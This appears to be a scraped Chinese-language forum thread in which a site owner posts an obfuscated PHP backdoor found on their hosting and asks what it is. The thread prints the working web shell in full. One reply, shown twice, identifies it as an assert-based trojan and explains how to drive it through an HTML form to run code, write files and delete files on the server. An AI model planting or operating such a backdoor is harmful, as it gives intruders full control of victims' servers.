@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
請問這是什麼意思?
我的網站被主機屋封了,然後他們叫我刪掉遊戲登入器,我不太懂,就看了下FTP裡面,
有這段代碼,不會是駭客注入的吧?
回複討論(解決方案)
有一個名為7.php的檔案,我從來沒見過的,然后里面有這段代碼
是木馬,利用assert來執行php函數的。
7.php
然後建立一個調用7.php的html檔案,擺在任何位置都可以,action那裡的7.php改為對應的http路徑就可以了。
shell.html
New Document
然後運行shell.html,
1.在textarea中輸入 phpinfo(); 後提交,可以看到phpinfo();的資訊
2.如在textarea中輸入 file_put_contents('abc.php','', true); 後提交,則會在伺服器上建立一個abc.php檔案。
3.輸入 unlink('xxxxx'); 後提交,就能刪除xxx檔案。
謝謝樓上的解答,我已經刪了,就是想知道為什麼
是木馬,利用assert來執行php函數的。
7.php
然後建立一個調用7.php的html檔案,擺在任何位置都可以,action那裡的7.php改為對應的http路徑就可以了。
shell.html
New Document
然後運行shell.html,
1.在textarea中輸入 phpinfo(); 後提交,可以看到phpinfo();的資訊
2.如在textarea中輸入 file_put_contents('abc.php','', true); 後提交,則會在伺服器上建立一個abc.php檔案。
3.輸入 unlink('xxxxx'); 後提交,就能刪除xxx檔案。
大神我結貼了,順便問一下有沒有方法防範這種攻擊?
都讓人留後門了,還能防範嗎?